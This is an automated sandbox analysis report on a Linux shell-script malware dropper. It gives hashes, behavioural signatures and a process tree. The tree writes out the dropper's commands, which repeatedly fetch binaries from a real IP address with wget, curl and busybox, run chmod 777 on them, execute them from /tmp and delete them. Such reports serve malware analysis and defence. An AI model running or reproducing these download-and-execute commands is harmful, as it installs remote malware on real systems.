Analysis
-
max time kernel
19s -
max time network
49s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:37
Static task
static1
Behavioral task
behavioral1
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh
-
Size
10KB
-
MD5
d02d2cc45f453ae469915bf5bfcf48ec
-
SHA1
5db9569732492cb7f0762973db3950e0cbbff9d8
-
SHA256
ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1
-
SHA512
e6f62639d7a9ed67f76e803004282c82162e299db70a632e144b81ac07192254c5e424f5bc32b5267f608d7b11c7692c55098a8f3d0dd4fe69efa61d22430f3b
-
SSDEEP
96:rb5p07Lo4jxniybeVFX5Xe4WVykrlkz9Cb5O:rb5y7Lo4jp+Fwb5O
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 716 chmod 767 chmod 797 chmod 809 chmod 815 chmod 674 chmod 684 chmod 791 chmod 803 chmod 821 chmod 731 chmod 749 chmod -
Executes dropped EXE 12 IoCs
ioc pid Process /tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd 675 Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd /tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y 685 vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y /tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 718 1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 /tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D 733 U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D /tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 750 l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 /tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy 768 Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy /tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH 792 dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH /tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 798 tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 /tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx 804 EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx /tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 810 RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 /tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB 816 s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB /tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr 822 ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr -
Checks CPU configuration 1 TTPs 12 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr curl File opened for modification /tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd curl File opened for modification /tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y curl File opened for modification /tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2 curl File opened for modification /tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx curl File opened for modification /tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8 curl File opened for modification /tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6 curl File opened for modification /tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB curl File opened for modification /tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0 curl File opened for modification /tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D curl File opened for modification /tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy curl File opened for modification /tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH curl
Processes
-
/tmp/ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh/tmp/ace24a1256fc97981ff007772c03f80a114e30643e235c7c1e4bcc7c44b841a1.sh1⤵PID:646
-
/bin/rm/bin/rm bins.sh2⤵PID:649
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:652
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:662
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:671
-
-
/bin/chmodchmod 777 Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- File and Directory Permissions Modification
PID:674
-
-
/tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd./Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- Executes dropped EXE
PID:675
-
-
/bin/rmrm Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:677
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:679
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:683
-
-
/bin/chmodchmod 777 vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y./vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- Executes dropped EXE
PID:685
-
-
/bin/rmrm vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:686
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵PID:687
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:695
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵PID:700
-
-
/bin/chmodchmod 777 1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵
- File and Directory Permissions Modification
PID:716
-
-
/tmp/1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p0./1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵
- Executes dropped EXE
PID:718
-
-
/bin/rmrm 1fm1DeVphHg1DZZHH47ZPv70NWZZFpT7p02⤵PID:719
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵PID:721
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵PID:729
-
-
/bin/chmodchmod 777 U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D./U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm U4fFuy1q2XODr7qwe40o7y72iOHJXfR93D2⤵PID:734
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵PID:748
-
-
/bin/chmodchmod 777 l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX2./l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm l9jcok77AdZWyxfq8H7QiIYLgZefgmzMX22⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵PID:764
-
-
/bin/chmodchmod 777 Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy./Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm Gmc5KIxt0DVU03uvQ6jTbtTVnR7SEFOmMy2⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵PID:771
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵PID:790
-
-
/bin/chmodchmod 777 dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH./dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm dWZhfzcpFLdEyVrYOAGiUkLQTrEighpOGH2⤵PID:793
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵PID:796
-
-
/bin/chmodchmod 777 tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA8./tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm tcVFntFjTOfvC2G6AwzWQ6OiEGt1vsRMA82⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:802
-
-
/bin/chmodchmod 777 EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx./EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:805
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵PID:806
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵PID:808
-
-
/bin/chmodchmod 777 RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM6./RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm RsQQqAbRqBMURl38Bp15NIT4LOEQbHrBM62⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:814
-
-
/bin/chmodchmod 777 s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB./s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:820
-
-
/bin/chmodchmod 777 ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr./ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵PID:824
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97